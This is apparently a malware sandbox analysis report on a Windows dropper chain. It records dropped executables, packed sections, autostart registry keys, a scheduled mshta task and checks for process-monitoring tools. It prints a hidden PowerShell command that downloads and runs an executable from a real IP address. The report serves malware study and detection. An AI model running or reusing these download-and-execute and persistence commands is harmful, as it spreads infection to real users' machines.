Source: random[1].exe.2.dr	Static PE information: real checksum: 0x320572 should be: 0x31b9bb
Source: Y-Cleaner.exe.16.dr	Static PE information: real checksum: 0x0 should be: 0x105d9c
Source: random[2].exe.2.dr	Static PE information: real checksum: 0x3d00f6 should be: 0x3d2335
Source: 5a20b6327b.exe.2.dr	Static PE information: real checksum: 0x320572 should be: 0x31b9bb
Source: soft[1].16.dr	Static PE information: real checksum: 0x0 should be: 0x105d9c
Source: random[1].exe1.2.dr	Static PE information: real checksum: 0x1cf713 should be: 0x1dd532
Source: 9f19f13091.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x63f89
Source: dbe8776a6a.exe.2.dr	Static PE information: real checksum: 0x3d00f6 should be: 0x3d2335
Source: random[2].exe0.2.dr	Static PE information: real checksum: 0x315f2d should be: 0x3215ba
Source: cefa09b2a4.exe.2.dr	Static PE information: real checksum: 0x1b2888 should be: 0x1b1e65
Source: random[1].exe2.2.dr	Static PE information: real checksum: 0x47f7c1 should be: 0x48d043
Source: random[2].exe1.2.dr	Static PE information: real checksum: 0x1bcb23 should be: 0x1c5042
Source: random.exe	Static PE information: real checksum: 0x0 should be: 0x74722
Source: dll[1].16.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x74722
Source: 43a79b4335.exe.2.dr	Static PE information: real checksum: 0x1bcb23 should be: 0x1c5042
Source: dd662b5386.exe.2.dr	Static PE information: real checksum: 0x47f7c1 should be: 0x48d043

Source: random[1].exe.2.dr	Static PE information: section name:
Source: random[1].exe.2.dr	Static PE information: section name: .idata
Source: random[1].exe.2.dr	Static PE information: section name: dnccwvtb
Source: random[1].exe.2.dr	Static PE information: section name: becnjhyy
Source: random[1].exe.2.dr	Static PE information: section name: .taggant
Source: 5a20b6327b.exe.2.dr	Static PE information: section name:
Source: 5a20b6327b.exe.2.dr	Static PE information: section name: .idata
Source: 5a20b6327b.exe.2.dr	Static PE information: section name: dnccwvtb
Source: 5a20b6327b.exe.2.dr	Static PE information: section name: becnjhyy
Source: 5a20b6327b.exe.2.dr	Static PE information: section name: .taggant
Source: random[1].exe0.2.dr	Static PE information: section name: .css
Source: 9f19f13091.exe.2.dr	Static PE information: section name: .css
Source: random[1].exe1.2.dr	Static PE information: section name:
Source: random[1].exe1.2.dr	Static PE information: section name: .idata
Source: random[1].exe1.2.dr	Static PE information: section name:
Source: random[1].exe1.2.dr	Static PE information: section name: jiatgfgj
Source: random[1].exe1.2.dr	Static PE information: section name: swwymbco
Source: random[1].exe1.2.dr	Static PE information: section name: .taggant
Source: 1e8e57d62a.exe.2.dr	Static PE information: section name:
Source: 1e8e57d62a.exe.2.dr	Static PE information: section name: .idata
Source: 1e8e57d62a.exe.2.dr	Static PE information: section name:
Source: 1e8e57d62a.exe.2.dr	Static PE information: section name: jiatgfgj
Source: 1e8e57d62a.exe.2.dr	Static PE information: section name: swwymbco
Source: 1e8e57d62a.exe.2.dr	Static PE information: section name: .taggant
Source: random[1].exe2.2.dr	Static PE information: section name:
Source: random[1].exe2.2.dr	Static PE information: section name: .idata
Source: random[1].exe2.2.dr	Static PE information: section name:
Source: random[1].exe2.2.dr	Static PE information: section name: ddmefbwf
Source: random[1].exe2.2.dr	Static PE information: section name: kzslwcdl
Source: random[1].exe2.2.dr	Static PE information: section name: .taggant
Source: dd662b5386.exe.2.dr	Static PE information: section name:
Source: dd662b5386.exe.2.dr	Static PE information: section name: .idata
Source: dd662b5386.exe.2.dr	Static PE information: section name:
Source: dd662b5386.exe.2.dr	Static PE information: section name: ddmefbwf
Source: dd662b5386.exe.2.dr	Static PE information: section name: kzslwcdl
Source: dd662b5386.exe.2.dr	Static PE information: section name: .taggant
Source: random[2].exe.2.dr	Static PE information: section name:
Source: random[2].exe.2.dr	Static PE information: section name: .idata
Source: random[2].exe.2.dr	Static PE information: section name:
Source: random[2].exe.2.dr	Static PE information: section name: tkveuiub
Source: random[2].exe.2.dr	Static PE information: section name: tfhtqqdj
Source: random[2].exe.2.dr	Static PE information: section name: .taggant
Source: dbe8776a6a.exe.2.dr	Static PE information: section name:
Source: dbe8776a6a.exe.2.dr	Static PE information: section name: .idata
Source: dbe8776a6a.exe.2.dr	Static PE information: section name:
Source: dbe8776a6a.exe.2.dr	Static PE information: section name: tkveuiub
Source: dbe8776a6a.exe.2.dr	Static PE information: section name: tfhtqqdj
Source: dbe8776a6a.exe.2.dr	Static PE information: section name: .taggant
Source: random[2].exe0.2.dr	Static PE information: section name:
Source: random[2].exe0.2.dr	Static PE information: section name: .idata
Source: random[2].exe0.2.dr	Static PE information: section name: utpvtpfy
Source: random[2].exe0.2.dr	Static PE information: section name: jrgknaqy
Source: random[2].exe0.2.dr	Static PE information: section name: .taggant
Source: 186adf2617.exe.2.dr	Static PE information: section name:
Source: 186adf2617.exe.2.dr	Static PE information: section name: .idata
Source: 186adf2617.exe.2.dr	Static PE information: section name: utpvtpfy
Source: 186adf2617.exe.2.dr	Static PE information: section name: jrgknaqy
Source: 186adf2617.exe.2.dr	Static PE information: section name: .taggant
Source: random[2].exe1.2.dr	Static PE information: section name:
Source: random[2].exe1.2.dr	Static PE information: section name: .idata
Source: random[2].exe1.2.dr	Static PE information: section name:
Source: random[2].exe1.2.dr	Static PE information: section name: zapzckdv
Source: random[2].exe1.2.dr	Static PE information: section name: yjxxvwfv
Source: random[2].exe1.2.dr	Static PE information: section name: .taggant
Source: 43a79b4335.exe.2.dr	Static PE information: section name:
Source: 43a79b4335.exe.2.dr	Static PE information: section name: .idata
Source: 43a79b4335.exe.2.dr	Static PE information: section name:
Source: 43a79b4335.exe.2.dr	Static PE information: section name: zapzckdv
Source: 43a79b4335.exe.2.dr	Static PE information: section name: yjxxvwfv
Source: 43a79b4335.exe.2.dr	Static PE information: section name: .taggant
Source: random[3].exe.2.dr	Static PE information: section name:
Source: random[3].exe.2.dr	Static PE information: section name: .idata
Source: random[3].exe.2.dr	Static PE information: section name:
Source: random[3].exe.2.dr	Static PE information: section name: ajpgbetr
Source: random[3].exe.2.dr	Static PE information: section name: jqmimmnn
Source: random[3].exe.2.dr	Static PE information: section name: .taggant
Source: cefa09b2a4.exe.2.dr	Static PE information: section name:
Source: cefa09b2a4.exe.2.dr	Static PE information: section name: .idata
Source: cefa09b2a4.exe.2.dr	Static PE information: section name:
Source: cefa09b2a4.exe.2.dr	Static PE information: section name: ajpgbetr
Source: cefa09b2a4.exe.2.dr	Static PE information: section name: jqmimmnn
Source: cefa09b2a4.exe.2.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009C72EF pushad ; iretd	0_2_009C72F0
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009CE506 pushad ; iretd	0_2_009CE50E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009D9FC1 push ecx; ret	0_2_009D9FD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B472EF pushad ; iretd	1_2_00B472F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B59FC1 push ecx; ret	1_2_00B59FD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B472EF pushad ; iretd	2_2_00B472F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B59FC1 push ecx; ret	2_2_00B59FD4
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0044D1FA push ebp; iretd	6_2_0044D291
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0044C9AE push edx; ret	6_2_0044C9AF
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_00445EE0 push eax; mov dword ptr [esp], 2E29287Bh	6_2_00445EE1
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0044D6FC pushad ; iretd	6_2_0044D6FD
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0044D700 push ebp; iretd	6_2_0044D701
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 6_2_0044D708 pushad ; iretd	6_2_0044D709
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD7AF1 push eax; iretd	11_3_00CD7AF2
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD7AF1 push eax; iretd	11_3_00CD7AF2
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDFC89 push 8800CAD3h; retf	11_3_00CDFDE5
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDFC89 push 8800CAD3h; retf	11_3_00CDFDE5
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD8095 push ecx; iretd	11_3_00CD8096
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD8095 push ecx; iretd	11_3_00CD8096
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD1CA1 pushad ; iretd	11_3_00CD1D35
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD1CA1 pushad ; iretd	11_3_00CD1D35
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD7ABD push ebp; iretd	11_3_00CD7ABA
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD7ABD push ebp; iretd	11_3_00CD7ABA
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDFE4D push 7800D28Eh; iretd	11_3_00CDFE55
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDFE4D push 7800D28Eh; iretd	11_3_00CDFE55
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDAC59 push cs; retf	11_3_00CDAC42
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CDAC59 push cs; retf	11_3_00CDAC42
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD7E6D push ebp; iretd	11_3_00CD7E32
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD7E6D push ebp; iretd	11_3_00CD7E32
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD7A68 push ebp; iretd	11_3_00CD7ABA
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CD7A68 push ebp; iretd	11_3_00CD7ABA

Source: random[1].exe.2.dr	Static PE information: section name: entropy: 7.12335748853375
Source: 5a20b6327b.exe.2.dr	Static PE information: section name: entropy: 7.12335748853375
Source: random[1].exe1.2.dr	Static PE information: section name: entropy: 7.982880594516539
Source: random[1].exe1.2.dr	Static PE information: section name: jiatgfgj entropy: 7.952892001097289
Source: 1e8e57d62a.exe.2.dr	Static PE information: section name: entropy: 7.982880594516539
Source: 1e8e57d62a.exe.2.dr	Static PE information: section name: jiatgfgj entropy: 7.952892001097289
Source: random[1].exe2.2.dr	Static PE information: section name: ddmefbwf entropy: 7.919239600856475
Source: dd662b5386.exe.2.dr	Static PE information: section name: ddmefbwf entropy: 7.919239600856475
Source: random[2].exe.2.dr	Static PE information: section name: tkveuiub entropy: 7.921697671602079
Source: dbe8776a6a.exe.2.dr	Static PE information: section name: tkveuiub entropy: 7.921697671602079
Source: random[2].exe0.2.dr	Static PE information: section name: entropy: 7.222570974099676
Source: 186adf2617.exe.2.dr	Static PE information: section name: entropy: 7.222570974099676
Source: random[2].exe1.2.dr	Static PE information: section name: zapzckdv entropy: 7.952870857301388
Source: 43a79b4335.exe.2.dr	Static PE information: section name: zapzckdv entropy: 7.952870857301388
Source: random[3].exe.2.dr	Static PE information: section name: ajpgbetr entropy: 7.953546777991043
Source: cefa09b2a4.exe.2.dr	Static PE information: section name: ajpgbetr entropy: 7.953546777991043
Source: Y-Cleaner.exe.16.dr	Static PE information: section name: .text entropy: 7.869741129501483
Source: soft[1].16.dr	Static PE information: section name: .text entropy: 7.869741129501483

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\soft[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[3].exe	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Temp\VF4D5GDAK1f2ev\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Temp\VF4D5GDAK1f2ev\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\Desktop\random.exe	File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File created: C:\Users\user\AppData\Local\Temp\O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Jump to dropped file

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]			Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\soft[1]			Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cefa09b2a4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 43a79b4335.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 40c4d92e87.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 186adf2617.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 977b4d66ef.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Window searched: window name: Regmonclass

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f

Source: C:\Users\user\Desktop\random.exe

File created: C:\Windows\Tasks\rapes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 186adf2617.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 186adf2617.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 43a79b4335.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 43a79b4335.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 40c4d92e87.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 40c4d92e87.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cefa09b2a4.exe	Jump to behavior
